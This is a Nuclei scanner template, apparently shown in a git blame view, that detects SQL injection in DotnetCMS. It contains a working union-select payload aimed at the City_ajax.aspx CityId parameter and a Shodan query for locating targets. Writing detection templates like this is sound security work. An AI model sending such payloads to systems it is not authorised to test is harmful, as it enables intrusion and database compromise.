nuclei-templates/vulnerabilities/other/dotnetcms-sqli.yaml

30 lines
677 B
YAML
Raw Normal View History

2022-05-30 13:33:36 +00:00
id: dotnetcms-sqli
info:
name: DotnetCMS SQLi
author: ritikchaddha
severity: high
metadata:
verified: true
2022-05-30 17:26:35 +00:00
shodan-query: http.html:"dotnetcms"
2022-05-30 13:33:36 +00:00
reference:
- https://www.cnblogs.com/rebeyond/p/4951418.html
- http://wy.zone.ci/bug_detail.php?wybug_id=wooyun-2015-0150742
tags: dotnetcms,dotnet,sqli
requests:
- method: GET
path:
2022-05-30 17:26:35 +00:00
- "{{BaseURL}}/user/City_ajax.aspx?CityId=33'union%20select%20sys.fn_sqlvarbasetostr(HashBytes('MD5','{{randstr}}')),2--"
2022-05-30 13:33:36 +00:00
matchers-condition: and
matchers:
2022-05-30 17:26:35 +00:00
- type: word
part: body
words:
- '{{md5("{{randstr}}")}}'
2022-05-30 13:33:36 +00:00
2022-05-30 17:26:35 +00:00
- type: status
status:
- 200